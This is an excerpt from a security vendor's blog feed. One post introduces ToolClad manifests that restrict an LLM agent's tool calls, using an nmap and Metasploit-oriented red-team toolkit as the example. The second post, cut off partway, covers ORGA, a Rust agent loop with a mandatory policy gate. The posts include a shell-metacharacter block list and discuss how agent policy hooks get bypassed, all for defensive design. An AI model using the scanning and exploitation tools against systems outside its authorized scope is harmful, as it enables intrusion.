<p>This is an allow-list. The dangerous action cannot be expressed because the interface does not permit it.</p>

<p>A ToolClad manifest (<code class="language-plaintext highlighter-rouge">.clad.toml</code>) is the complete behavioral contract for a tool. It answers four questions:</p>

<ol>
  <li><strong>What can this tool accept?</strong> Typed parameters with validation constraints: enums, ranges, regex patterns, scope checks, injection sanitization.</li>
  <li><strong>How do you invoke it?</strong> A command template, HTTP request, MCP server call, PTY session, or browser action. The LLM never generates raw invocation details.</li>
  <li><strong>What does it produce?</strong> Output format, parsing rules, and a mandatory output schema that normalizes raw output into structured JSON. The LLM knows the shape of results before proposing a call.</li>
  <li><strong>What is the interaction model?</strong> Oneshot execution, interactive PTY session, or governed headless browser. All three share the same governance layer.</li>
</ol>

<p>Here is what a manifest looks like in practice:</p>

<div class="language-toml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># tools/nmap_scan.clad.toml</span>
<span class="nn">[tool]</span>
<span class="py">name</span> <span class="p">=</span> <span class="s">"nmap_scan"</span>
<span class="py">version</span> <span class="p">=</span> <span class="s">"1.0.0"</span>
<span class="py">binary</span> <span class="p">=</span> <span class="s">"nmap"</span>
<span class="py">description</span> <span class="p">=</span> <span class="s">"Network port scanning and service detection"</span>
<span class="py">timeout_seconds</span> <span class="p">=</span> <span class="mi">600</span>
<span class="py">risk_tier</span> <span class="p">=</span> <span class="s">"low"</span>

<span class="nn">[tool.cedar]</span>
<span class="py">resource</span> <span class="p">=</span> <span class="s">"PenTest::ScanTarget"</span>
<span class="py">action</span> <span class="p">=</span> <span class="s">"execute_tool"</span>

<span class="nn">[args.target]</span>
<span class="py">position</span> <span class="p">=</span> <span class="mi">1</span>
<span class="py">required</span> <span class="p">=</span> <span class="kc">true</span>
<span class="py">type</span> <span class="p">=</span> <span class="s">"scope_target"</span>
<span class="py">description</span> <span class="p">=</span> <span class="s">"Target CIDR, IP, or hostname"</span>

<span class="nn">[args.scan_type]</span>
<span class="py">position</span> <span class="p">=</span> <span class="mi">2</span>
<span class="py">required</span> <span class="p">=</span> <span class="kc">true</span>
<span class="py">type</span> <span class="p">=</span> <span class="s">"enum"</span>
<span class="py">allowed</span> <span class="p">=</span> <span class="p">[</span><span class="s">"ping"</span><span class="p">,</span> <span class="s">"service"</span><span class="p">,</span> <span class="s">"version"</span><span class="p">,</span> <span class="s">"syn"</span><span class="p">,</span> <span class="s">"os_detect"</span><span class="p">]</span>
<span class="py">description</span> <span class="p">=</span> <span class="s">"Type of scan to perform"</span>

<span class="nn">[command]</span>
<span class="py">template</span> <span class="p">=</span> <span class="s">"nmap {scan_type_flags} {target}"</span>

<span class="nn">[output]</span>
<span class="py">format</span> <span class="p">=</span> <span class="s">"xml"</span>
<span class="py">parser</span> <span class="p">=</span> <span class="s">"builtin:xml"</span>
<span class="py">envelope</span> <span class="p">=</span> <span class="kc">true</span>

<span class="nn">[output.schema]</span>
<span class="py">type</span> <span class="p">=</span> <span class="s">"object"</span>

<span class="nn">[output.schema.properties.hosts]</span>
<span class="py">type</span> <span class="p">=</span> <span class="s">"array"</span>
<span class="py">description</span> <span class="p">=</span> <span class="s">"Discovered hosts with open ports and services"</span>
</code></pre></div></div>

<p>The agent cannot inject shell metacharacters into <code class="language-plaintext highlighter-rouge">target</code> because the <code class="language-plaintext highlighter-rouge">scope_target</code> type rejects them. It cannot request a scan type outside the declared enum. It cannot alter the command template. The parameter space is bounded and enumerable.</p>

<h2 id="the-type-system-does-the-heavy-lifting">The Type System Does the Heavy Lifting</h2>

<p>ToolClad ships 14 built-in types (10 core, 4 extended) that cover the patterns repeated across every tool wrapper we have ever written. Every type includes injection sanitization by default. The design principle: “valid according to the type” means “safe to interpolate into a command.”</p>

<p>The core types are <code class="language-plaintext highlighter-rouge">string</code>, <code class="language-plaintext highlighter-rouge">integer</code>, <code class="language-plaintext highlighter-rouge">port</code>, <code class="language-plaintext highlighter-rouge">boolean</code>, <code class="language-plaintext highlighter-rouge">enum</code>, <code class="language-plaintext highlighter-rouge">scope_target</code>, <code class="language-plaintext highlighter-rouge">url</code>, <code class="language-plaintext highlighter-rouge">path</code>, <code class="language-plaintext highlighter-rouge">ip_address</code>, and <code class="language-plaintext highlighter-rouge">cidr</code>. Each one blocks shell metacharacters (<code class="language-plaintext highlighter-rouge">;|&amp;$\</code>(){}[]&lt;&gt;!\n\r`) at the validation layer, before the command is ever constructed.</p>

<p>The extended types handle domain-specific patterns: <code class="language-plaintext highlighter-rouge">credential_file</code> (path that must exist and be read-only), <code class="language-plaintext highlighter-rouge">duration</code> (integer with time suffix), <code class="language-plaintext highlighter-rouge">regex_match</code> (matches a declared pattern), and <code class="language-plaintext highlighter-rouge">msf_options</code> (semicolon-delimited key-value pairs for Metasploit).</p>

<p>Projects can also define custom reusable types:</p>

<div class="language-toml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># toolclad.toml (project root)</span>
<span class="nn">[types.service_protocol]</span>
<span class="py">base</span> <span class="p">=</span> <span class="s">"enum"</span>
<span class="py">allowed</span> <span class="p">=</span> <span class="p">[</span><span class="s">"ssh"</span><span class="p">,</span> <span class="s">"ftp"</span><span class="p">,</span> <span class="s">"http"</span><span class="p">,</span> <span class="s">"https"</span><span class="p">,</span> <span class="s">"smb"</span><span class="p">,</span> <span class="s">"rdp"</span><span class="p">,</span> <span class="s">"mysql"</span><span class="p">,</span> <span class="s">"postgres"</span><span class="p">]</span>

<span class="nn">[types.severity_level]</span>
<span class="py">base</span> <span class="p">=</span> <span class="s">"enum"</span>
<span class="py">allowed</span> <span class="p">=</span> <span class="p">[</span><span class="s">"info"</span><span class="p">,</span> <span class="s">"low"</span><span class="p">,</span> <span class="s">"medium"</span><span class="p">,</span> <span class="s">"high"</span><span class="p">,</span> <span class="s">"critical"</span><span class="p">]</span>
</code></pre></div></div>

<p>Then reference them across manifests: <code class="language-plaintext highlighter-rouge">type = "service_protocol"</code>. Define once, validate everywhere.</p>

<h2 id="three-execution-modes-one-governance-layer">Three Execution Modes, One Governance Layer</h2>

<p>The real power of ToolClad is that it extends the same allow-list model to interactive and browser-based tools, not just one-shot CLI commands.</p>

<p><strong>Oneshot mode</strong> is the default. Execute a command, return the result. Three backends: shell command, HTTP request, or MCP server proxy. This covers the 80% case of wrapping existing CLI tools.</p>

<p><strong>Session mode</strong> maintains a running PTY process (think <code class="language-plaintext highlighter-rouge">psql</code>, <code class="language-plaintext highlighter-rouge">redis-cli</code>, <code class="language-plaintext highlighter-rouge">msfconsole</code>) where each interaction is independently validated and policy-gated. The manifest declares which commands are allowed, validates each one against a regex pattern, applies Cedar policy per interaction, and tracks session state. The interactive tool becomes a typed, state-aware, policy-gated API surface.</p>

<p><strong>Browser mode</strong> maintains a governed headless browser session via CDP or Playwright. Navigation URLs are scope-checked against an allow-list of domains. Form submission requires explicit approval. JavaScript execution is a separately gated high-risk command. The governance layer is identical to session mode; only the transport differs.</p>

<p>All three modes produce the same structured evidence envelope: scan ID, timestamps, SHA-256 hash of output, exit code, stderr. Every tool invocation is auditable by default.</p>

<h2 id="what-this-enables">What This Enables</h2>

<p>When tool contracts are declarative, interesting properties follow.</p>

<p><strong>Static analysis.</strong> You can determine what any tool can possibly do before it ever runs, by inspecting the manifest. Cedar policies can reference manifest-declared properties. A compliance team can audit the entire tool surface without reading wrapper code.</p>

<p><strong>Formal verification.</strong> The parameter space is finite and enumerable for enum types, bounded for numeric types, and regex-constrained for string types. You can prove properties about valid invocations.</p>

<p><strong>Automatic policy generation.</strong> A tool with a <code class="language-plaintext highlighter-rouge">target</code> parameter of type <code class="language-plaintext highlighter-rouge">scope_target</code> inherently requires scope authorization. Cedar policies can be derived from manifests. The manifest is the policy’s source of truth.</p>

<p><strong>MCP schema generation.</strong> Every manifest auto-generates <code class="language-plaintext highlighter-rouge">inputSchema</code> and <code class="language-plaintext highlighter-rouge">outputSchema</code> for MCP tool registration. Write one TOML file, get type-safe LLM tool use for free.</p>

<p><strong>Cryptographic integrity via SchemaPin.</strong> The manifest’s SHA-256 hash can be signed and published using SchemaPin’s existing TOFU pinning infrastructure. If someone tampers with a command template, a validation rule, or a scope constraint, the hash changes and verification fails. This is strictly stronger than signing only the MCP JSON Schema, because the JSON Schema does not capture execution behavior.</p>

<h2 id="the-8020-split">The 80/20 Split</h2>

<p>ToolClad’s command template system is deliberately not Turing-complete. It handles conditionals for the common case (“include this flag when this parameter is set”) but it does not try to express every possible tool invocation.</p>

<p>Our experience with the <a href="https://github.com/ThirdKeyAI/symbi-redteam">symbi-redteam</a> toolkit confirms the split: roughly 14 of 19 tools are pure template tools, 3 use simple conditionals, and 2 need escape hatches (a <code class="language-plaintext highlighter-rouge">command.executor</code> wrapper script). When you find yourself building elaborate conditional chains in TOML, that is the signal to use the escape hatch. ToolClad still provides parameter validation, scope enforcement, timeout, evidence capture, and the output envelope. The wrapper only handles command construction.</p>

<p>If more than 20-30% of your tools need escape hatches, the tools themselves are complex enough to justify custom wrappers. ToolClad’s value shifts from “eliminate wrappers” to “standardize the contract around them.”</p>

<h2 id="available-now-four-languages">Available Now, Four Languages</h2>

<p>ToolClad v0.5.1 ships reference implementations in Rust, Python, JavaScript, and Go. Each provides manifest parsing, 14 type validators, command construction, execution with process group isolation, output parsing, MCP schema generation, and evidence envelopes.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cargo <span class="nb">install </span>toolclad        <span class="c"># Rust / crates.io</span>
pip <span class="nb">install </span>toolclad           <span class="c"># Python / PyPI</span>
npm <span class="nb">install </span>toolclad           <span class="c"># JavaScript / npm</span>
</code></pre></div></div>

<p>The CLI gives you four commands: <code class="language-plaintext highlighter-rouge">validate</code> (parse and check a manifest), <code class="language-plaintext highlighter-rouge">run</code> (execute with validated arguments), <code class="language-plaintext highlighter-rouge">test</code> (dry run), and <code class="language-plaintext highlighter-rouge">schema</code> (output MCP JSON Schema).</p>

<p>The specification is MIT licensed. The Symbiont runtime integration is Apache 2.0. Use it however you want.</p>

<h2 id="what-comes-next">What Comes Next</h2>

<p>v1 is local-only by design. Manifests live in your <code class="language-plaintext highlighter-rouge">tools/</code> directory and get checked into version control. Remote manifest fetching introduces supply chain risk that we are not willing to accept without mandatory SchemaPin signature verification, which is planned for v2.</p>

<p>In the Symbiont runtime, ToolClad manifests are auto-discovered from the <code class="language-plaintext highlighter-rouge">tools/</code> directory at startup. The runtime registers them as MCP tools, evaluates Cedar policy using manifest-declared resource/action pairs, and wraps every invocation in the ORGA Gate phase. No Rust code required to add a new tool.</p>

<p>The broader goal is a standard contract format for agent tool use across runtimes. If your agent platform can read a <code class="language-plaintext highlighter-rouge">.clad.toml</code> file, it can safely dispatch any tool described by one. The manifest is the API. The manifest is the policy. The manifest is the documentation.</p>

<p>Stop writing wrapper scripts. Stop letting your agent write shell commands. Declare the contract instead.</p>

<hr />

<p><em>ToolClad is open source at <a href="https://github.com/ThirdKeyAI/ToolClad">github.com/ThirdKeyAI/ToolClad</a>. The full design specification is in <a href="https://github.com/ThirdKeyAI/ToolClad/blob/main/TOOLCLAD_DESIGN_SPEC.md">TOOLCLAD_DESIGN_SPEC.md</a>. Questions, feedback, and contributions welcome.</em></p>

<p><em>ToolClad is part of the <a href="https://thirdkey.ai">ThirdKey Trust Stack</a>: SchemaPin (tool integrity), AgentPin (agent identity), ToolClad (behavioral contracts), and Symbiont (zero-trust runtime).</em></p>]]></content><author><name>ThirdKey Team</name></author><category term="AI Security" /><category term="Agent Runtime" /><category term="Tool Safety" /><category term="toolclad" /><category term="ai agents" /><category term="security" /><category term="tool contracts" /><category term="mcp" /><category term="cedar" /><category term="symbiont" /><category term="trust stack" /><category term="agentic systems" /><summary type="html"><![CDATA[Introducing ToolClad: Declarative Tool Interface Contracts for Agentic Runtimes]]></summary></entry><entry><title type="html">ORGA: A Typestate-Enforced Agent Runtime That Makes Policy a Phase, Not a Feature</title><link href="http://research.thirdkey.ai/blog/orga-architecture-typestate-agent-runtime/" rel="alternate" type="text/html" title="ORGA: A Typestate-Enforced Agent Runtime That Makes Policy a Phase, Not a Feature" /><published>2026-03-02T00:00:00+00:00</published><updated>2026-03-02T00:00:00+00:00</updated><id>http://research.thirdkey.ai/blog/orga-architecture-typestate-agent-runtime</id><content type="html" xml:base="http://research.thirdkey.ai/blog/orga-architecture-typestate-agent-runtime/"><![CDATA[<p>Every agent framework has a loop. Call the LLM, parse the tool calls, execute them, feed the results back. ReAct, AutoGPT, LangGraph, CrewAI — the shape is always the same. What differs is what happens when things go wrong, and more importantly, what <em>can’t</em> happen at all.</p>

<p>Symbiont’s reasoning loop is called <strong>ORGA</strong> — Observe, Reason, Gate, Act. The name is deliberate: the “Gate” phase isn’t optional middleware or a plugin. It’s a compile-time-enforced phase of execution that every agent action must pass through before it can reach the outside world.</p>

<p>This post introduces the architecture, explains the four innovations that make it novel, and walks through how they work together.</p>

<h2 id="the-problem-with-policy-as-middleware">The Problem with “Policy as Middleware”</h2>

<p>Most agent frameworks treat safety as a layer you bolt on. A callback before tool execution. A filter on the output. An approval queue in a dashboard somewhere. These approaches share a failure mode: they can be bypassed, forgotten, or misconfigured.</p>

<p>Consider a typical agent loop:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>LLM generates tool call → Execute tool → Return result → Repeat
</code></pre></div></div>

<p>Where does policy go? Usually one of two places:</p>

<ol>
  <li><strong>Before execution</strong> — a hook that checks whether the tool call is allowed. If someone forgets to register the hook, the tool runs anyway.</li>
  <li><strong>After generation</strong> — a filter on the LLM’s output. If the output format changes slightly, the filter misses it.</li>
</ol>

<p>Both approaches treat policy as external to the loop’s core logic. The loop <em>works</em> without them. That’s the problem.</p>

<h2 id="orga-policy-as-a-mandatory-phase">ORGA: Policy as a Mandatory Phase</h2>

<p>ORGA restructures the agent loop so that policy evaluation is a phase transition — the same kind of primitive as “call the LLM” or “execute the tool.” You can’t skip it any more than you can skip reasoning.</p>

<svg class="flowchart" id="mermaid-svg" width="100%" xmlns="http://www.w3.org/2000/svg" style="max-width: 579.4375px;" viewBox="0 0 579.4375 105" role="graphics-document document" aria-roledescription="flowchart-v2" xmlns:xlink="http://www.w3.org/1999/xlink"><style xmlns="http://www.w3.org/1999/xhtml">@import url("https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css");</style><style>#mermaid-svg{font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#ccc;}@keyframes edge-animation-frame{from{stroke-dashoffset:0;}}@keyframes dash{to{stroke-dashoffset:0;}}#mermaid-svg .edge-animation-slow{stroke-dasharray:9,5!important;stroke-dashoffset:900;animation:dash 50s linear infinite;stroke-linecap:round;}#mermaid-svg .edge-animation-fast{stroke-dasharray:9,5!important;stroke-dashoffset:900;animation:dash 20s linear infinite;stroke-linecap:round;}#mermaid-svg .error-icon{fill:#a44141;}#mermaid-svg .error-text{fill:#ddd;stroke:#ddd;}#mermaid-svg .edge-thickness-normal{stroke-width:1px;}#mermaid-svg .edge-thickness-thick{stroke-width:3.5px;}#mermaid-svg .edge-pattern-solid{stroke-dasharray:0;}#mermaid-svg .edge-thickness-invisible{stroke-width:0;fill:none;}#mermaid-svg .edge-pattern-dashed{stroke-dasharray:3;}#mermaid-svg .edge-pattern-dotted{stroke-dasharray:2;}#mermaid-svg .marker{fill:lightgrey;stroke:lightgrey;}#mermaid-svg .marker.cross{stroke:lightgrey;}#mermaid-svg svg{font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;}#mermaid-svg p{margin:0;}#mermaid-svg .label{font-family:"trebuchet ms",verdana,arial,sans-serif;color:#ccc;}#mermaid-svg .cluster-label text{fill:#F9FFFE;}#mermaid-svg .cluster-label span{color:#F9FFFE;}#mermaid-svg .cluster-label span p{background-color:transparent;}#mermaid-svg .label text,#mermaid-svg span{fill:#ccc;color:#ccc;}#mermaid-svg .node rect,#mermaid-svg .node circle,#mermaid-svg .node ellipse,#mermaid-svg .node polygon,#mermaid-svg .node path{fill:#1f2020;stroke:#ccc;stroke-width:1px;}#mermaid-svg .rough-node .label text,#mermaid-svg .node .label text,#mermaid-svg .image-shape .label,#mermaid-svg .icon-shape .label{text-anchor:middle;}#mermaid-svg .node .katex path{fill:#000;stroke:#000;stroke-width:1px;}#mermaid-svg .rough-node .label,#mermaid-svg .node .label,#mermaid-svg .image-shape .label,#mermaid-svg .icon-shape .label{text-align:center;}#mermaid-svg .node.clickable{cursor:pointer;}#mermaid-svg .root .anchor path{fill:lightgrey!important;stroke-width:0;stroke:lightgrey;}#mermaid-svg .arrowheadPath{fill:lightgrey;}#mermaid-svg .edgePath .path{stroke:lightgrey;stroke-width:2.0px;}#mermaid-svg .flowchart-link{stroke:lightgrey;fill:none;}#mermaid-svg .edgeLabel{background-color:hsl(0, 0%, 34.4117647059%);text-align:center;}#mermaid-svg .edgeLabel p{background-color:hsl(0, 0%, 34.4117647059%);}#mermaid-svg .edgeLabel rect{opacity:0.5;background-color:hsl(0, 0%, 34.4117647059%);fill:hsl(0, 0%, 34.4117647059%);}#mermaid-svg .labelBkg{background-color:rgba(87.75, 87.75, 87.75, 0.5);}#mermaid-svg .cluster rect{fill:hsl(180, 1.5873015873%, 28.3529411765%);stroke:rgba(255, 255, 255, 0.25);stroke-width:1px;}#mermaid-svg .cluster text{fill:#F9FFFE;}#mermaid-svg .cluster span{color:#F9FFFE;}#mermaid-svg div.mermaidTooltip{position:absolute;text-align:center;max-width:200px;padding:2px;font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:12px;background:hsl(20, 1.5873015873%, 12.3529411765%);border:1px solid rgba(255, 255, 255, 0.25);border-radius:2px;pointer-events:none;z-index:100;}#mermaid-svg .flowchartTitleText{text-anchor:middle;font-size:18px;fill:#ccc;}#mermaid-svg rect.text{fill:none;stroke-width:0;}#mermaid-svg .icon-shape,#mermaid-svg .image-shape{background-color:hsl(0, 0%, 34.4117647059%);text-align:center;}#mermaid-svg .icon-shape p,#mermaid-svg .image-shape p{background-color:hsl(0, 0%, 34.4117647059%);padding:2px;}#mermaid-svg .icon-shape rect,#mermaid-svg .image-shape rect{opacity:0.5;background-color:hsl(0, 0%, 34.4117647059%);fill:hsl(0, 0%, 34.4117647059%);}#mermaid-svg .label-icon{display:inline-block;height:1em;overflow:visible;vertical-align:-0.125em;}#mermaid-svg .node .label-icon path{fill:currentColor;stroke:revert;stroke-width:revert;}#mermaid-svg :root{--mermaid-font-family:"trebuchet ms",verdana,arial,sans-serif;}</style><g><marker id="mermaid-svg_flowchart-v2-pointEnd" class="marker flowchart-v2" viewBox="0 0 10 10" refX="5" refY="5" markerUnits="userSpaceOnUse" markerWidth="8" markerHeight="8" orient="auto"><path d="M 0 0 L 10 5 L 0 10 z" class="arrowMarkerPath" style="stroke-width: 1; stroke-dasharray: 1, 0;" /></marker><marker id="mermaid-svg_flowchart-v2-pointStart" class="marker flowchart-v2" viewBox="0 0 10 10" refX="4.5" refY="5" markerUnits="userSpaceOnUse" markerWidth="8" markerHeight="8" orient="auto"><path d="M 0 5 L 10 10 L 10 0 z" class="arrowMarkerPath" style="stroke-width: 1; stroke-dasharray: 1, 0;" /></marker><marker id="mermaid-svg_flowchart-v2-circleEnd" class="marker flowchart-v2" viewBox="0 0 10 10" refX="11" refY="5" markerUnits="userSpaceOnUse" markerWidth="11" markerHeight="11" orient="auto"><circle cx="5" cy="5" r="5" class="arrowMarkerPath" style="stroke-width: 1; stroke-dasharray: 1, 0;" /></marker><marker id="mermaid-svg_flowchart-v2-circleStart" class="marker flowchart-v2" viewBox="0 0 10 10" refX="-1" refY="5" markerUnits="userSpaceOnUse" markerWidth="11" markerHeight="11" orient="auto"><circle cx="5" cy="5" r="5" class="arrowMarkerPath" style="stroke-width: 1; stroke-dasharray: 1, 0;" /></marker><marker id="mermaid-svg_flowchart-v2-crossEnd" class="marker cross flowchart-v2" viewBox="0 0 11 11" refX="12" refY="5.2" markerUnits="userSpaceOnUse" markerWidth="11" markerHeight="11" orient="auto"><path d="M 1,1 l 9,9 M 10,1 l -9,9" class="arrowMarkerPath" style="stroke-width: 2; stroke-dasharray: 1, 0;" /></marker><marker id="mermaid-svg_flowchart-v2-crossStart" class="marker cross flowchart-v2" viewBox="0 0 11 11" refX="-1" refY="5.2" markerUnits="userSpaceOnUse" markerWidth="11" markerHeight="11" orient="auto"><path d="M 1,1 l 9,9 M 10,1 l -9,9" class="arrowMarkerPath" style="stroke-width: 2; stroke-dasharray: 1, 0;" /></marker><g class="root"><g class="clusters" /><g class="edgePaths"><path d="M128.469,44.093L132.635,42.577C136.802,41.062,145.135,38.031,152.802,36.515C160.469,35,167.469,35,170.969,35L174.469,35" id="L_O_R_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_O_R_0" data-points="W3sieCI6MTI4LjQ2ODc1LCJ5Ijo0NC4wOTI1NzU2MTg2OTg0NH0seyJ4IjoxNTMuNDY4NzUsInkiOjM1fSx7IngiOjE3OC40Njg3NSwieSI6MzV9XQ==" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M293.625,35L297.792,35C301.958,35,310.292,35,317.958,35C325.625,35,332.625,35,336.125,35L339.625,35" id="L_R_G_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_R_G_0" data-points="W3sieCI6MjkzLjYyNSwieSI6MzV9LHsieCI6MzE4LjYyNSwieSI6MzV9LHsieCI6MzQzLjYyNSwieSI6MzV9XQ==" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M438.313,35L442.479,35C446.646,35,454.979,35,462.708,36.659C470.437,38.318,477.562,41.636,481.124,43.295L484.686,44.954" id="L_G_A_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_G_A_0" data-points="W3sieCI6NDM4LjMxMjUsInkiOjM1fSx7IngiOjQ2My4zMTI1LCJ5IjozNX0seyJ4Ijo0ODguMzEyNSwieSI6NDYuNjQzMTkyNDg4MjYyOTF9XQ==" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M488.313,85.357L484.146,87.297C479.979,89.238,471.646,93.119,455.422,95.059C439.198,97,415.083,97,390.969,97C366.854,97,342.74,97,316.919,97C291.099,97,263.573,97,236.047,97C208.521,97,180.995,97,163.692,95.712C146.388,94.425,139.308,91.85,135.768,90.562L132.228,89.275" id="L_A_O_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_A_O_0" data-points="W3sieCI6NDg4LjMxMjUsInkiOjg1LjM1NjgwNzUxMTczNzA5fSx7IngiOjQ2My4zMTI1LCJ5Ijo5N30seyJ4IjozOTAuOTY4NzUsInkiOjk3fSx7IngiOjMxOC42MjUsInkiOjk3fSx7IngiOjIzNi4wNDY4NzUsInkiOjk3fSx7IngiOjE1My40Njg3NSwieSI6OTd9LHsieCI6MTI4LjQ2ODc1LCJ5Ijo4Ny45MDc0MjQzODEzMDE1NX1d" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /></g><g class="edgeLabels"><g class="edgeLabel"><g class="label" data-id="L_O_R_0" transform="translate(0, 0)"><foreignObject width="0" height="0"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "></span></div></foreignObject></g></g><g class="edgeLabel"><g class="label" data-id="L_R_G_0" transform="translate(0, 0)"><foreignObject width="0" height="0"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "></span></div></foreignObject></g></g><g class="edgeLabel"><g class="label" data-id="L_G_A_0" transform="translate(0, 0)"><foreignObject width="0" height="0"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "></span></div></foreignObject></g></g><g class="edgeLabel"><g class="label" data-id="L_A_O_0" transform="translate(0, 0)"><foreignObject width="0" height="0"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "></span></div></foreignObject></g></g></g><g class="nodes"><g class="node default  " id="flowchart-O-0" transform="translate(68.234375, 66)"><rect class="basic label-container" style="" x="-60.234375" y="-27" width="120.46875" height="54" /><g class="label" style="" transform="translate(-30.234375, -12)"><rect /><foreignObject width="60.46875" height="24"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>Observe</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-R-1" transform="translate(236.046875, 35)"><rect class="basic label-container" style="" x="-57.578125" y="-27" width="115.15625" height="54" /><g class="label" style="" transform="translate(-27.578125, -12)"><rect /><foreignObject width="55.15625" height="24"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>Reason</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-G-3" transform="translate(390.96875, 35)"><rect class="basic label-container" style="" x="-47.34375" y="-27" width="94.6875" height="54" /><g class="label" style="" transform="translate(-17.34375, -12)"><rect /><foreignObject width="34.6875" height="24"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>Gate</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-A-5" transform="translate(529.875, 66)"><rect class="basic label-container" style="" x="-41.5625" y="-27" width="83.125" height="54" /><g class="label" style="" transform="translate(-11.5625, -12)"><rect /><foreignObject width="23.125" height="24"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>Act</p></span></div></foreignObject></g></g></g></g></g></svg>

<p>Each phase is a distinct type in Rust’s type system. The loop physically cannot progress from Reason to Act without passing through Gate, because the compiler won’t let you call <code class="language-plaintext highlighter-rouge">dispatch_tools()</code> on a value of type <code class="language-plaintext highlighter-rouge">AgentLoop&lt;PolicyCheck&gt;</code> — only <code class="language-plaintext highlighter-rouge">check_policy()</code> is available. And <code class="language-plaintext highlighter-rouge">dispatch_tools()</code> only exists on <code class="language-plaintext highlighter-rouge">AgentLoop&lt;ToolDispatching&gt;</code>, which you can only obtain from a successful policy check.</p>

<p>This is enforced at compile time. Not at runtime. Not by convention. By the type checker.</p>

<h2 id="the-four-pillars">The Four Pillars</h2>

<p>ORGA’s novelty isn’t any single technique — it’s combining four mechanisms into a single runtime primitive:</p>

<h3 id="1-typestate-enforced-phase-ordering">1. Typestate-Enforced Phase Ordering</h3>

<p>Each phase of the loop is a zero-sized type marker that implements the <code class="language-plaintext highlighter-rouge">AgentPhase</code> trait:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">pub</span> <span class="k">trait</span> <span class="n">AgentPhase</span> <span class="p">{}</span>

<span class="k">pub</span> <span class="k">struct</span> <span class="n">Reasoning</span><span class="p">;</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">PolicyCheck</span><span class="p">;</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">ToolDispatching</span><span class="p">;</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">Observing</span><span class="p">;</span>

<span class="k">impl</span> <span class="n">AgentPhase</span> <span class="k">for</span> <span class="n">Reasoning</span> <span class="p">{}</span>
<span class="k">impl</span> <span class="n">AgentPhase</span> <span class="k">for</span> <span class="n">PolicyCheck</span> <span class="p">{}</span>
<span class="k">impl</span> <span class="n">AgentPhase</span> <span class="k">for</span> <span class="n">ToolDispatching</span> <span class="p">{}</span>
<span class="k">impl</span> <span class="n">AgentPhase</span> <span class="k">for</span> <span class="n">Observing</span> <span class="p">{}</span>

<span class="k">pub</span> <span class="k">struct</span> <span class="n">AgentLoop</span><span class="o">&lt;</span><span class="n">Phase</span><span class="p">:</span> <span class="n">AgentPhase</span><span class="o">&gt;</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="n">state</span><span class="p">:</span> <span class="n">LoopState</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">config</span><span class="p">:</span> <span class="n">LoopConfig</span><span class="p">,</span>
    <span class="n">_phase</span><span class="p">:</span> <span class="n">PhantomData</span><span class="o">&lt;</span><span class="n">Phase</span><span class="o">&gt;</span><span class="p">,</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Phase transitions consume <code class="language-plaintext highlighter-rouge">self</code> and return the next phase:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">impl</span> <span class="n">AgentLoop</span><span class="o">&lt;</span><span class="n">Reasoning</span><span class="o">&gt;</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">produce_output</span><span class="p">(</span><span class="k">self</span><span class="p">,</span> <span class="o">...</span><span class="p">)</span>
        <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="n">AgentLoop</span><span class="o">&lt;</span><span class="n">PolicyCheck</span><span class="o">&gt;</span><span class="p">,</span> <span class="n">LoopTermination</span><span class="o">&gt;</span><span class="p">;</span>
<span class="p">}</span>

